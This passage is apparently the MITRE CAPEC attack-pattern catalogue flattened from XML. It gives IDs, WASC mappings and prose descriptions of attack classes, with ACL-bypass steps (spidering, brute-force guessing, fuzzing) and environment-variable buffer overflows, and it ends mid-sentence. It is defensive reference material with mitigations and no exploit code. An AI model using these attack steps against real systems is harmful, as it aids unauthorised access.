Graph This view organizes attack patterns hierarchically based on mechanisms that are frequently employed when exploiting a vulnerability. 1000 Category HasMember 118 1000 Category HasMember 119 1000 Category HasMember 152 1000 Category HasMember 156 1000 Category HasMember 172 1000 Category HasMember 210 1000 Category HasMember 223 1000 Category HasMember 225 1000 Category HasMember 232 1000 Category HasMember 255 1000 Category HasMember 262 1000 Attack Pattern HasMember 286 1000 Category HasMember 436 1000 Attack Pattern HasMember 403 1000 Attack Pattern HasMember 437 MITRE Content Team MITRE 2013-06-21 Updated View_Objective Implicit_Slice This view (slice) covers all the elements in CAPEC. true() Implicit_Slice This view (slice) covers meta abstraction attack patterns. .//@Pattern_Abstraction='Meta' Implicit_Slice This view (slice) covers standard abstraction attack patterns. .//@Pattern_Abstraction='Standard' Implicit_Slice This view (slice) covers detailed abstraction attack patterns. .//@Pattern_Abstraction='Detailed' Explicit_Slice CAPEC nodes in this view (graph) are associated with the WASC Threat Classification 2.0. 333 Category HasMember 336 333 Category HasMember 338 333 Category HasMember 339 333 Category HasMember 340 333 Category HasMember 341 333 Category HasMember 342 333 Category HasMember 343 333 Category HasMember 344 333 Category HasMember 345 333 Category HasMember 351 333 Category HasMember 352 333 Category HasMember 356 333 Category HasMember 357 333 Category HasMember 358 333 Category HasMember 359 333 Category HasMember 360 333 Category HasMember 361 333 Category HasMember 362 333 Category HasMember 363 333 Category HasMember 364 333 Category HasMember 365 333 Category HasMember 366 333 Category HasMember 367 333 Category HasMember 368 333 Category HasMember 369 333 Category HasMember 370 333 Category HasMember 371 333 Category HasMember 372 333 Category HasMember 374 333 Category HasMember 375 333 Category HasMember 376 333 Category HasMember 377 333 Category HasMember 378 333 Category HasMember 379 CAPEC Content Team MITRE 2013-11-26 Removed deprecated entries from Relationships CAPEC Content Team MITRE 2013-12-18 Updated Relationships Implicit_Slice CAPEC nodes in this view (slice) have been deprecated. .//@Status='Deprecated' An attacker uses well-formed requests to an application, service, or device that results in the inadvertent disclosure of sensitive information by exploiting weaknesses in the design or configuration of the target resulting in the target revealing more information to an attacker than intended. The attacker may collect this information through a variety of methods including active querying as well as passive observation. Information may include details regarding the configuration or capabilities of the target, clues as to the timing or nature of activities, or otherwise sensitive information. Often this sort of attack is undertaken in preparation for some other type of attack, although the collection of information may be the end goal of the attacker in some cases. Information retrieved may aid the attacker in making inferences about potential weaknesses, vulnerabilities, or techniques that assist the attackers' objectives. Data leaks may come various forms, including confidential information stored in insecure directories, or via services that provide rich error or diagnostic messages in response to normal queries. 404 Targeted The target must have some piece of sensitive information that can collected by an attacker. The attacker must have tools to collect the information from the target. This requires a client capable of interacting with the target. For web applications, a web browser or tools such as MITM (Man-In-the-Middle) Proxy. CAPEC Content Team MITRE 2013-12-18 Updated Description, Relationships CAPEC Content Team MITRE 2014-02-06 Updated Description An attacker depletes a resource to the point that the target's functionality is affected. Virtually any resource necessary for the target's operation can be targeted in this attack. The result of a successful resource depletion attack is usually the degrading or denial of one or more services offered by the target. Resources required will depend on the nature of the resource to be depleted, the amount of the resource the target has access to, and other mitigating circumstances such as the target's ability to shift load, detect and mitigate resource depletion attacks, or acquire additional resources to deal with the depletion. The more protected the resource and the greater the quantity of it that must be consumed, the more resources the attacker will need to have at their disposal. 404 Targeted 770 Targeted The target must rely on a vulnerable resource for its operations and be unable to replace it in a reasonable amount of time if it is unavailable. The attacker must have the ability to consume, destroy, or disrupt a resource required for normal operation of the target. In order to deplete the target's resources the attacker must interact with the target in a programmatic way. Depending on the nature of the resource the attacker may need a client or script capable of making repeated requests over a network, or the ability to craft specific requests, such as an HTTP request containing thousands of slashes. If the attacker has some privileges on the system the required resource will likely be the ability to run a binary or upload a compiled exploit, or write and execute a script or program that consumes resources. Depending on the defenses of the targeted system, the attacker may need access to extensive computational and network resources in order to overwhelm the target. 333 Category HasMember 343 An attacker uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \) and/or dots (.)) to reach desired directories or files. The attacker must be able to control the path that is requested of the target. The target must fail to adequately sanitize incoming paths The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application. 1000 Attack Pattern ChildOf 154 333 Category HasMember 366 CAPEC Content Team MITRE 2013-12-18 Updated Description, Relationships An attacker is able to control or disrupt the behavior of an target through crafted input data submitted using an interface functioning to process data input. This happens when the attacker adds material to their input that is interpreted by the application causing the targeted application to perform steps unintended by the application manager or causing the application to enter an unstable state. This attack differs from Data Structure Attacks in that the latter attacks subvert the underlying structures that hold user-provided data, either pre-empting interpretation of the input (in the case of Buffer Overflows) or resulting in values that the targeted application is unable to handle correctly (in the case of Integer Overflows). In Injection attacks, the input is interpreted by the application, but the attacker has included instructions to the interpreting functions that the target application then follows. The target application must accept input from the user. In virtually all cases, this must be string input. The attacker must fail to adequately filter the user input against the insertion of instructions to the input interpreter. No special resources are required for most variants of this attack. An attacker interacts with the target in such a way as to convince the target that it is interacting with some other principal and as such take actions based on the level of trust that exists between the target and the other principal. Spoofing attacks assume that some piece of content or functionality is associated with an identity and that the content is trusted by the target because of this association. Spoofing refers to the falsification of the content and/or identity in such a way that the target will incorrectly trust the legitimacy of the content. The attacker then uses this content to execute an attack. For example, an attacker may modify a financial transaction between two parties so that the participants remain unchanged but the amount of the transaction is increased. If the recipient cannot detect the change, they may incorrectly assume the modified message originated with the original sender. Spoofing may involve an attacker crafting the content from scratch or capturing and modifying legitimate content. The targeted content must be associated (possibly implicitly) with an identity and the targeted application or user must hold some trust about the content this identity is providing. The attacker must be able to change the content, identity, or both in a way that is not detectable to the recipient and the recipient must fail to verify authenticity to the supposed source of the data. Cryptographic identity verification schemes can prevent this type of attack. No special resources are required for most versions of this attack. If the attack involves modification of ongoing transactions, the attacker must be able to intercept communications between the sender and the target. An attacker exploits weaknesses in timing or state maintaining functions to perform actions that would otherwise be prevented by the execution flow of the target code and processes. An example of a state attack might include manipulation of an application's information to change the apparent credentials or similar information, possibly allowing the application to access material it would not normally be allowed to access. A common example of a timing attack is a test-action race condition where some state information is tested and, if it passes, an action is performed. If the attacker can change the state between the time that the application performs the test and the time the action is performed, then they might be able to manipulate the outcome of the action to malicious ends. 665 Targeted Virtually all applications can be subject to time or state attacks in some form. State attacks require the ability to manipulate the underlying state of an application. If that state is stored in a simple file, this can be relatively easy. If the state is stored internally, this can be more difficult. Timing attacks rely on being able to control when an application's thread is interrupted in order to insert the malicious action. Even then, if the actions in the sequence happen quickly, then success can largely be a matter of luck. As such, having many opportunities to attempt the attack is usually a requirement since and individual attack may have a low probability of success. An attacker manipulates one or more functions of an application in order to perform an attack. This is a broad class of attacks wherein the attacker is able to alter the intended result or purpose of the functionality and thereby affect application behavior or information integrity. Outcomes can range from vandalism and reduction in service to the execution of arbitrary code on the target machine. All applications are potentially vulnerable to this class of attack as all applications have by nature, intended functionality. Attacker requirements will vary depending on the nature of the functionality to be manipulated. 333 Category HasMember 375 CAPEC Content Team MITRE 2013-12-18 Updated Attack_Prerequisites, Description, Resources_Required 1000 Category ChildOf 210 An attacker utilizes probabilistic techniques to explore and overcome security properties of the target that are based on an assumption of strength due to the extremely low mathematical probability that an attacker would be able to identify and exploit the very rare specific conditions under which those security properties do not hold. 1000 Attack Pattern ChildOf 281 333 Category HasMember 378 CAPEC Content Team MITRE 2013-12-18 Updated Relationships An attacker actively targets exploitation of weaknesses, limitations and assumptions in the mechanisms a target utilizes to manage identity and authentication. Such exploitation can lead to the complete subversion of any trust the target system may have in the identity of any entity with which it interacts. Weaknesses targeted by these sorts of attacks are often due to assumptions and overconfidence in the strength or rigor of the implemented authentication mechanisms. 306 Targeted An attacker actively targets exploitation of weaknesses, limitations and assumptions in the mechanisms a target utilizes to manage access to its resources or authorize utilization of its functionality. Such exploitation can lead to the complete subversion of any control the target has over its data or functionality enabling almost any desired action on the part of the attacker. Weaknesses targeted by these sorts of attacks are often due to three primary factors: 1) a fundamental dependence on authentication mechanisms being effective; 2) a lack of effective control over the separation of privilege between various entities; and 3) assumptions and overconfidence in the strength or rigor of the implemented authorization mechanisms. 79 Targeted 732 Targeted 807 Targeted 1000 Category ChildOf 232 1000 Category ChildOf 152 333 Category HasMember 338 An attacker manipulates and exploits characteristics of system data structures in order to violate the intended usage and protections of these structures. This is done in such a way that yields either improper access to the associated system data or violations of the security properties of the system itself due to vulnerabilities in how the system processes and manages the data structures. Often, vulnerabilities and therefore exploitability of these data structures exist due to ambiguity and assumption in their design and prescribed handling. An attacker manipulates one or more resources, or some attribute thereof, in order to perform an attack. This is a broad class of attacks wherein the attacker is able to change some aspect of a resource's state and thereby affect application behavior or information integrity. Examples of resources include files, applications, libraries, infrastructure, and configuration information. Outcomes can range from vandalism and reduction in service to the execution of arbitrary code on the target machine. All applications are potentially vulnerable to this class of attack as all applications rely on resources. Attacker requirements will vary depending on the nature of the resource to be manipulated and the relationship between this resource and the targeted application, if any. This category is related to the WASC Threat Classification 2.0 item Insufficient Authentication WASC Threat Classification 2.0 WASC-01 - Insufficient Authentication The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Insufficient-Authentication Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-01 - Insufficient Authentication This category is related to the WASC Threat Classification 2.0 item Insufficient Authorization WASC Threat Classification 2.0 WASC-02 - Insufficient Authorization The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Insufficient-Authorization Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-02 - Insufficient Authorization This category is related to the WASC Threat Classification 2.0 item Integer Overflows WASC Threat Classification 2.0 WASC-03 - Integer Overflows The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Integer-Overflows Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Insufficient Transport Layer Protection WASC Threat Classification 2.0 WASC-04 - Insufficient Transport Layer Protection The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Insufficient-Transport-Layer-Protection Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-04 - Insufficient Transport Layer Protection This category is related to the WASC Threat Classification 2.0 item Remote File Inclusion WASC Threat Classification 2.0 WASC-05 - Remote File Inclusion The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Remote-File-Inclusion Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Format String WASC Threat Classification 2.0 WASC-06 - Format String The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Format-String Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Buffer Overflow WASC Threat Classification 2.0 WASC-07 - Buffer Overflow The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Buffer-Overflow Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Cross-Site Scripting WASC Threat Classification 2.0 WASC-08 - Cross-Site Scripting The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Cross-Site-Scripting Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Cross-Site Request Forgery WASC Threat Classification 2.0 WASC-09 - Cross-Site Request Forgery The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Cross-Site-Request-Forgery Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Denial of Service WASC Threat Classification 2.0 WASC-10 - Denial of Service The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Denial-of-Service Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Brute Force WASC Threat Classification 2.0 WASC-11 - Brute Force The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Brute-Force Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Content Spoofing WASC Threat Classification 2.0 WASC-12 - Content Spoofing The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Content-Spoofing Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Information Leakage WASC Threat Classification 2.0 WASC-13 - Information Leakage The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Information-Leakage Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-13 - Information Leakage This category is related to the WASC Threat Classification 2.0 item Server Misconfiguration WASC Threat Classification 2.0 WASC-14 - Server Misconfiguration The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Server-Misconfiguration Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-14 - Server Misconfiguration This category is related to the WASC Threat Classification 2.0 item Application Misconfiguration WASC Threat Classification 2.0 WASC-15 - Application Misconfiguration The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Application-Misconfiguration Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-15 - Application Misconfiguration This category is related to the WASC Threat Classification 2.0 item Directory Indexing WASC Threat Classification 2.0 WASC-16 - Directory Indexing The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Directory-Indexing Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-16 - Directory Indexing This category is related to the WASC Threat Classification 2.0 item Improper Filesystem Permissions WASC Threat Classification 2.0 WASC-17 - Improper Filesystem Permissions The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Improper-Filesystem-Permissions Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-17 - Improper Filesystem Permissions This category is related to the WASC Threat Classification 2.0 item Credential/Session Prediction WASC Threat Classification 2.0 WASC-18 - Credential/Session Prediction The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Credential-and-Session-Prediction Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item SQL Injection WASC Threat Classification 2.0 WASC-19 - SQL Injection The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/SQL-Injection Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Improper Input Handling WASC Threat Classification 2.0 WASC-20 - Improper Input Handling The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Improper-Input-Handling Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-20 - Improper Input Handling This category is related to the WASC Threat Classification 2.0 item Insufficient Anti-automation WASC Threat Classification 2.0 WASC-21 - Insufficient Anti-automation The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Insufficient+Anti-automation Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-21 - Insufficient Anti-automation This category is related to the WASC Threat Classification 2.0 item Improper Output Handling WASC Threat Classification 2.0 WASC-22 - Improper Output Handling The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Improper-Output-Handling Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-22 - Improper Output Handling This category is related to the WASC Threat Classification 2.0 item XML Injection WASC Threat Classification 2.0 WASC-23 - XML Injection The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/XML-Injection Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item HTTP Request Splitting WASC Threat Classification 2.0 WASC-24 - HTTP Request Splitting The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/HTTP-Request-Splitting Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item HTTP Response Splitting WASC Threat Classification 2.0 WASC-25 - HTTP Response Splitting The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/HTTP-Response-Splitting Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item HTTP Request Smuggling WASC Threat Classification 2.0 WASC-26 - HTTP Request Smuggling The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/HTTP-Request-Smuggling Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item HTTP Response Smuggling WASC Threat Classification 2.0 WASC-27 - HTTP Response Smuggling The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/HTTP-Response-Smuggling Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Null Byte Injection WASC Threat Classification 2.0 WASC-28 - Null Byte Injection The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Null-Byte-Injection Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item LDAP Injection 1000 Attack Pattern HasMember 136 WASC Threat Classification 2.0 WASC-29 - LDAP Injection The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/LDAP-Injection Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 MITRE Content Team MITRE 2013-05-31 Added relationship has member This category is related to the WASC Threat Classification 2.0 item Mail Command Injection WASC Threat Classification 2.0 WASC-30 - Mail Command Injection The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Mail-Command-Injection Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item OS Commanding WASC Threat Classification 2.0 WASC-31 - OS Commanding The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/OS-Commanding Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Routing Detour WASC Threat Classification 2.0 WASC-32 - Routing Detour The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Routing-Detour Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Path Traversal WASC Threat Classification 2.0 WASC-33 - Path Traversal The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Path-Traversal Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Predictable Resource Location WASC Threat Classification 2.0 WASC-34 - Predictable Resource Location The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Predictable-Resource-Location Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item SOAP Array Abuse WASC Threat Classification 2.0 WASC-35 - SOAP Array Abuse The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/SOAP-Array-Abuse Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item SSI Injection WASC Threat Classification 2.0 WASC-36 - SSI Injection The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/SSI-Injection Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Session Fixation WASC Threat Classification 2.0 WASC-37 - Session Fixation The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Session-Fixation Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item URL Redirector Abuse WASC Threat Classification 2.0 WASC-38 - URL Redirector Abuse The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/URL-Redirector-Abuse Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item XPath Injection WASC Threat Classification 2.0 WASC-39 - XPath Injection The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/XPath-Injection Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Insufficient Process Validation WASC Threat Classification 2.0 WASC-40 - Insufficient Process Validation The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Insufficient-Process-Validation Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-40 - Insufficient Process Validation This category is related to the WASC Threat Classification 2.0 item XML Attribute Blowup WASC Threat Classification 2.0 WASC-41 - XML Attribute Blowup The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/XML-Attribute-Blowup Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Abuse of Functionality WASC Threat Classification 2.0 WASC-42 - Abuse of Functionality The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Abuse-of-Functionality Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item XML External Entities WASC Threat Classification 2.0 WASC-43 - XML External Entities The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/XML-External-Entities Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item XML Entity Expansion WASC Threat Classification 2.0 WASC-44 - XML Entity Expansion The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/XML-Entity-Expansion Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Fingerprinting WASC Threat Classification 2.0 WASC-45 - Fingerprinting The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Fingerprinting Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item XQuery Injection WASC Threat Classification 2.0 WASC-46 - XQuery Injection The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/XQuery-Injection Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 This category is related to the WASC Threat Classification 2.0 item Insufficient Session Expiration WASC Threat Classification 2.0 WASC-47 - Insufficient Session Expiration The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Insufficient-Session-Expiration Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-47 - Insufficient Session Expiration This category is related to the WASC Threat Classification 2.0 item Insecure Indexing WASC Threat Classification 2.0 WASC-48 - Insecure Indexing The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Insecure-Indexing Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-48 - Insecure Indexing This category is related to the WASC Threat Classification 2.0 item Insufficient Password Recovery WASC Threat Classification 2.0 WASC-49 - Insufficient Password Recovery The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Insufficient-Password-Recovery Romain Gaucher Cigital, Inc. 2010-02-01 Romain Gaucher Cigital, Inc. 2010-02-01 WASC Threat Classification 2.0 - WASC-49 - Insufficient Password Recovery An attacker exploits vulnerabilities in the physical realm utilizing various techniques against physical entities and properties. Tom Stracener MITRE 2010-10-27 Tom Stracener MITRE 2010-10-27 Sean Barnum MITRE 2010-10-27 Review and revision of content Sean Barnum MITRE 2010-10-27 Review and revision of content In applications, particularly web applications, access to functionality is mitigated by the authorization framework, whose job it is to map ACLs to elements of the application's functionality; particularly URL's for web apps. In the case that the application deployer failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application or can run queries for data that he is otherwise not supposed to. Survey The attacker surveys the target application, possibly as a valid and authenticated user Spidering web sites for all available links env-Web Brute force guessing of resource names env-All Brute force guessing of user names / credentials env-All Brute force guessing of function names / actions env-All ACLs or other access control mechanisms are present in the software env-Web env-ClientServer User IDs or other credentials are present in the software env-Web env-ClientServer Operating modes with different privileges are present in the software env-ClientServer env-Local env-Embedded Identify Functionality At each step, the attacker notes the resource or functionality access mechanism invoked upon performing specific actions Use the web inventory of all forms and inputs and apply attack data to those inputs. env-Web Use a packet sniffer to capture and record network traffic env-CommProtocol Execute the software in a debugger and record API calls into the operating system or important libraries. This might occur in an environment other than a production environment, in order to find weaknesses that can be exploited in a production environment. env-Local env-Embedded The attacker produces a list of functionality or data that can be accessed through the system. Iterate over access capabilities Possibly as a valid user, the attacker then tries to access each of the noted access mechanisms directly in order to perform functions not constrained by the ACLs. Fuzzing of API parameters (URL parameters, OS API parameters, protocol parameters) env-Web env-Local env-Embedded env-ClientServer Attempts to create a catalog of access mechanisms and data have failed. env-All Functionality is accessible to unauthorized users. The application must be navigable in a manner that associates elements (subsections) of the application with ACLs. The various resources, or individual URLs, must be somehow discoverable by the attacker The deployer must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource. High Very High Analysis Brute Force Implementing the Model-View-Controller (MVC) within Java EE's Servlet paradigm using a "Single front controller" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets. If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted. Low In order to discover unrestricted resources, the attacker does not need special tools or skills. He only has to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly. No special resources are required for the exploit of this pattern. In the case of web applications, use of a spider or other crawling software can allow an attacker to search for accessible pages not beholden to a security constraint. More generally, noting the target resource accessed upon performing specific actions drives an understanding of the resources accessible from the current context. In a J2EE setting, deployers can associate a role that is impossible for the authenticator to grant users, such as "NoAccess", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user. Having done so, any direct access to those protected Servlets will be prohibited by the web container. In a more general setting, the deployer must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic. Confidentiality Access_Control Authorization Gain privileges / assume identity 285 Targeted 732 Targeted 276 Targeted 693 Targeted 721 Targeted 434 Targeted 1000 Attack Pattern ChildOf 122 All resources must be constrained to be inaccessible by default followed by selectively allowing access to resources as dictated by application and business logic In addition to a central controller, every resource must also restrict, wherever possible, incoming accesses as dictated by the relevant ACL. Failing Securely Least Privilege Reluctance To Trust Complete Mediation Use Authorization Mechanisms Correctly Design Configuration Subsystems Correctly and Distribute Safe Default Configurations Penetration High Medium Low All All All All John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Execution Flow, Attack Prerequisites, Examples and Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Execution Flow, Attack Prerequisites, Examples and Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables. The attacker tries to find an environment variable which can be overwritten for instance by gathering information about the target host (error pages, software's version number, etc.). The attacker manipulates the environment variable to contain excessive-length content to cause a buffer overflow. The attacker potentially leverages the buffer overflow to inject maliciously crafted code in an attempt to execute privileged command on the target environment. The application uses environment variables. An environment variable exposed to the user is vulnerable to a buffer overflow. The vulnerable environment variable uses untrusted data. Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer. High High Injection Attack Example: Buffer Overflow in $HOME A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable. CVE-1999-0906 Attack Example: Buffer Overflow in TERM A buffer overflow in the rlogin program involves its consumption of the 